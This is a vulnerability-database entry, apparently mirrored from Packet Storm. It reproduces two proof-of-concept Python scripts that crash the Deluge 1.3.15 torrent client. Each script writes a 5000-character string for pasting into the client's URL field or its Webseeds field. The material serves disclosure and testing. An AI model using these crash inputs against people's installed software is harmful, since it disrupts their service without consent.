Lucene search
+L

Deluge 1.3.15 Webseeds / URL Denial Of Service

🗓️ 21 May 2019 00:00:00Reported by Victor MondragonType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 59 Views

Deluge 1.3.15 'URL' and 'Webseeds' Denial of Service (PoC) discovered by Victor Mondragón in 2019. Windows 7 SP1 x64 tested

Code
`#Exploit Title: Deluge 1.3.15 - 'URL' Denial of Service (PoC)  
#Discovery by: Victor Mondragón  
#Discovery Date: 2019-05-20  
#Vendor Homepage: https://dev.deluge-torrent.org/  
#Software Link: http://download.deluge-torrent.org/windows/deluge-1.3.15-win32-py2.7.exe  
#Tested Version: 1.3.15  
#Tested on: Windows 7 Service Pack 1 x64  
  
#Steps to produce the crash:  
#1.- Run python code: deluge_url.py  
#2.- Open deluge_url.txt and copy content to clipboard  
#3.- Open deluge.exe  
#4.- Select "File" > "Add Torrent" > "URL"  
#5.- In "From URL" field paste Clipboard  
#6.- Select "OK"  
#7.- Crashed  
  
cod = "\x41" * 5000  
  
f = open('deluge_url.txt', 'w')  
f.write(cod)  
f.close()  
  
#Exploit Title: Deluge 1.3.15 - 'Webseeds' Denial of Service (PoC)  
#Discovery by: Victor Mondragón  
#Discovery Date: 2019-05-20  
#Vendor Homepage: https://dev.deluge-torrent.org/  
#Software Link: http://download.deluge-torrent.org/windows/deluge-1.3.15-win32-py2.7.exe  
#Tested Version: 1.3.15  
#Tested on: Windows 7 Service Pack 1 x64  
  
#Steps to produce the crash:  
#1.- Run python code: deluge_web.py  
#2.- Open deluge_web.txt and copy content to clipboard  
#3.- Open deluge.exe  
#4.- Select "File" > "Create Torrent"   
#5.- In "Webseeds" field paste Clipboard  
#6.- Crashed  
  
cod = "\x41" * 5000  
  
f = open('deluge_web.txt', 'w')  
f.write(cod)  
f.close()  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

21 May 2019 00:00Current
7.4High risk
Vulners AI Score7.4
59